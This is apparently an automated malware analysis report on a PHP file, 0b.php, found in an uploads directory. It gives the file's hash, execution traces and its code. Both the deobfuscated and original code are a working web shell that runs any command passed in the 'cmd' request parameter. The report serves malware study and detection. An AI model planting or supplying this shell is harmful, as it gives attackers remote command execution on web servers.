PHP Malware Analysis

0b.php

md5: 306acda3abf281cc55b9c23cc2a60496

Jump to:

Screenshot


Attributes

Execution


Deobfuscated PHP code

<?php

if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = $_REQUEST['cmd'];
    system($cmd);
    echo "</pre>";
    die;
}

Execution traces

data/traces/306acda3abf281cc55b9c23cc2a60496_trace-1676241774.4647.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:43:20.362524]
1	0	1	0.000149	393464
1	3	0	0.000205	394544	{main}	1		/var/www/html/uploads/0b.php	0	0
1	3	1	0.000222	394544
			0.000246	314200
TRACE END   [2023-02-12 20:43:20.362651]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php if(isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>